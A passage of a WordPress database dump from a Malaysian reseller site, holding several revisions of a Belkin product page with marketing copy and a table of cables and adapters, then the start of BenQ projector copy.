/>\n<strong>USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Lightning Audio + Charge RockStarâ„¢</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n</tr>\n</tbody>\n</table>','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2019-09-24 14:09:35','2019-09-24 06:09:35','',1446,'https://bintara.com.my/blog/2019/09/24/1446-revision-v1/',0,'revision','',0),(3270,1,'2019-09-24 14:11:18','2019-09-24 06:11:18','<h2>THE BELKIN DIFFERENCE</h2>\n<h4></h4>\n<h3>Innovation, with quality at its core</h3>\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\n<h3>Global leader in tech.</h3>\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\n<h3>Always looking to the future</h3>\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.\n<h3>An unwavering commitment to earning your trust.</h3>\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.\n<h3>Unmatched performance, every time</h3>\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\n<h3>We believe good design matters.</h3>\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\n<center>[maxbutton id=\"1\" ]</center>\n<h3>ProductÂ  : -</h3>\n<table>\n<tbody>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" />\n<strong>Ultra HD High Speed HDMIÂ® Cable</strong>\n<center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Mini DisplayPortTM to VGA</strong>\n<center>[maxbutton id=\"9\" ]\n</center></td>\n</tr>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Micro HDMI Adapter</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB A/B Device Cable * A/B DSTP</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.5 mm Audio + Charge RockStarâ„¢</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n</tr>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Lightning Audio + Charge RockStarâ„¢</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n</tr>\n</tbody>\n</table>','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2019-09-24 14:11:18','2019-09-24 06:11:18','',1446,'https://bintara.com.my/blog/2019/09/24/1446-revision-v1/',0,'revision','',0),(3272,1,'2019-09-24 14:14:02','2019-09-24 06:14:02','<h2>THE BELKIN DIFFERENCE</h2><h4>Â </h4><h3>Innovation, with quality at its core</h3><p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.</p><h3>Global leader in tech.</h3><p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.</p><h3>Always looking to the future</h3><p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.</p><h3>An unwavering commitment to earning your trust.</h3><p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.</p><h3>Unmatched performance, every time</h3><p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.</p><h3>We believe good design matters.</h3><p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.</p><p>Â </p><center>[maxbutton id=\"1\" ]</center><p>Â </p><h3>ProductÂ  : -</h3><table><tbody><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Â </strong></p><p><strong>3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</strong></p><p>Â </p><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" /></p><p><strong>Ultra HD High Speed HDMIÂ® Cable</strong></p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</strong></p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Mini DisplayPortTM to VGA</strong></p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center></td></tr><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Micro HDMI Adapter</strong></p><p>Â </p><center></center><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB A/B Device Cable * A/B DSTP</strong></p><p>Â </p><center></center><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>3.5 mm Audio + Charge RockStarâ„¢</strong></p><p>Â </p><center></center><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</strong></p><p>Â </p><center></center><center></center><center>[maxbutton id=\"9\" ]</center></td></tr><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</strong></p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</strong></p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</strong></p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Lightning Audio + Charge RockStarâ„¢</strong></p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center></td></tr></tbody></table>','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2019-09-24 14:14:02','2019-09-24 06:14:02','',1446,'https://bintara.com.my/blog/2019/09/24/1446-revision-v1/',0,'revision','',0),(3274,1,'2019-09-24 14:16:41','2019-09-24 06:16:41','<h2>THE BELKIN DIFFERENCE</h2>\n<h4></h4>\n<h3>Innovation, with quality at its core</h3>\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\n<h3>Global leader in tech.</h3>\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\n<h3>Always looking to the future</h3>\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.\n<h3>An unwavering commitment to earning your trust.</h3>\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.\n<h3>Unmatched performance, every time</h3>\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\n<h3>We believe good design matters.</h3>\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\n&nbsp;\n&nbsp;\n<center>[maxbutton id=\"1\" ]</center>&nbsp;\n<h3>ProductÂ  : -</h3>\n<table>\n<tbody>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Â </strong>\n<strong>3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</strong>\n&nbsp;\n<center>[maxbutton id=\"9\" ]</center><center></center></td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" />\n<strong>Ultra HD High Speed HDMIÂ® Cable</strong>\n&nbsp;\n&nbsp;\n<center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</strong>\n&nbsp;\n&nbsp;\n<center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Mini DisplayPortTM to VGA</strong>\n&nbsp;\n&nbsp;\n<center></center><center>[maxbutton id=\"9\" ]</center></td>\n</tr>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Micro HDMI Adapter</strong>\n&nbsp;\n&nbsp;\n<center></center><center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB A/B Device Cable * A/B DSTP</strong>\n&nbsp;\n&nbsp;\n<center></center><center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.5 mm Audio + Charge RockStarâ„¢</strong>\n&nbsp;\n&nbsp;\n<center></center><center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</strong>\n&nbsp;\n&nbsp;\n<center></center><center></center><center>[maxbutton id=\"9\" ]</center><center></center></td>\n</tr>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</strong>\n&nbsp;\n&nbsp;\n<center></center><center>[maxbutton id=\"9\" ]</center><center></center></td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</strong>\n&nbsp;\n&nbsp;\n<center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</strong>\n&nbsp;\n&nbsp;\n<center></center><center>[maxbutton id=\"9\" ]</center><center></center></td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Lightning Audio + Charge RockStarâ„¢</strong>\n&nbsp;\n&nbsp;\n<center></center><center>[maxbutton id=\"9\" ]</center></td>\n</tr>\n</tbody>\n</table>','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2019-09-24 14:16:41','2019-09-24 06:16:41','',1446,'https://bintara.com.my/blog/2019/09/24/1446-revision-v1/',0,'revision','',0),(3273,1,'2019-09-24 14:14:53','2019-09-24 06:14:53','<h2>THE BELKIN DIFFERENCE</h2><h4>Â </h4><h3>Innovation, with quality at its core</h3><p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.</p><h3>Global leader in tech.</h3><p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.</p><h3>Always looking to the future</h3><p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.</p><h3>An unwavering commitment to earning your trust.</h3><p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.</p><h3>Unmatched performance, every time</h3><p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.</p><h3>We believe good design matters.</h3><p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.</p><p>Â </p><p>Â </p><center>[maxbutton id=\"1\" ]</center><p>Â </p><h3>ProductÂ  : -</h3><table><tbody><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Â </strong></p><p><strong>3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</strong></p><p>Â </p><p>Â </p><center>[maxbutton id=\"9\" ]</center><center></center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" /></p><p><strong>Ultra HD High Speed HDMIÂ® Cable</strong></p><p>Â </p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</strong></p><p>Â </p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Mini DisplayPortTM to VGA</strong></p><p>Â </p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center></td></tr><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Micro HDMI Adapter</strong></p><p>Â </p><p>Â </p><center></center><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB A/B Device Cable * A/B DSTP</strong></p><p>Â </p><p>Â </p><center></center><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>3.5 mm Audio + Charge RockStarâ„¢</strong></p><p>Â </p><p>Â </p><center></center><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</strong></p><p>Â </p><p>Â </p><center></center><center></center><center>[maxbutton id=\"9\" ]</center><center></center></td></tr><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</strong></p><p>Â </p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center><center></center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</strong></p><p>Â </p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</strong></p><p>Â </p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center><center></center></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Lightning Audio + Charge RockStarâ„¢</strong></p><p>Â </p><p>Â </p><center></center><center>[maxbutton id=\"9\" ]</center></td></tr></tbody></table>','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2019-09-24 14:14:53','2019-09-24 06:14:53','',1446,'https://bintara.com.my/blog/2019/09/24/1446-revision-v1/',0,'revision','',0),(3276,1,'2019-09-24 14:21:01','2019-09-24 06:21:01','<h2>THE BELKIN DIFFERENCE</h2>\n<h4>&nbsp;</h4>\n<h3>Innovation, with quality at its core</h3>\n<p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.</p>\n<h3>Global leader in tech.</h3>\n<p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.</p>\n<h3>Always looking to the future</h3>\n<p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.</p>\n<h3>An unwavering commitment to earning your trust.</h3>\n<p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.</p>\n<h3>Unmatched performance, every time</h3>\n<p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.</p>\n<h3>We believe good design matters.</h3>\n<p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.</p>\n<p></p>\n<p></p>\n<p></p><center>[maxbutton id=\"1\" ]</center><p></p>\n<p></p>\n<h3>Product&nbsp; : -</h3>\n<table>\n<tbody>\n<tr>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong style=\"background-color: transparent; font-size: 0.875rem;\">3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</strong></p><p>\n<center>[maxbutton id=\"9\" ]</center><br></p><center></center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\"></p>\n<p><strong>Ultra HD High Speed HDMIÂ® Cable</strong></p>\n<p></p><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</strong></p>\n<center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>Mini DisplayPortTM to VGA</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center>[maxbutton id=\"9\" ]</center></td>\n</tr>\n<tr>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>Micro HDMI Adapter</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>USB A/B Device Cable * A/B DSTP</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>3.5 mm Audio + Charge RockStarâ„¢</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center></center><center>[maxbutton id=\"9\" ]</center><center></center></td>\n</tr>\n<tr>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center>[maxbutton id=\"9\" ]</center><center></center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center>[maxbutton id=\"9\" ]</center><center></center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>Lightning Audio + Charge RockStarâ„¢</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center>[maxbutton id=\"9\" ]</center></td>\n</tr>\n</tbody>\n</table>','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2019-09-24 14:21:01','2019-09-24 06:21:01','',1446,'https://bintara.com.my/blog/2019/09/24/1446-revision-v1/',0,'revision','',0),(3279,1,'2019-09-24 14:34:23','2019-09-24 06:34:23','<h1>Projectors</h1><h3>Â </h3><h2>Business Projector (Smart Design for Presentations)</h2><h3>High Brightness for Well-Lit Rooms</h3><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.</p><p>Â </p><h2>Interactive Classroom Projectors</h2><h3>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</h3><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.</p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li><li>High Brightness from 3000-3500 ANSI Lumens</li><li>High resolution with (Ultra) Short Throw</li><li>Scalable for Wireless Use and Interactivity</li></ul><h3>Â </h3><h1>Interactive Flat Panel</h1><h4>Â </h4><h2>Meeting Room &amp; Boardroom</h2><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.</p><p>Â </p><h3>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h3><h5>Work Collaboratively and Conduct Business Efficiently</h5><p>The RP840G is a modern enterpriseâ€™s one-stop display solution for 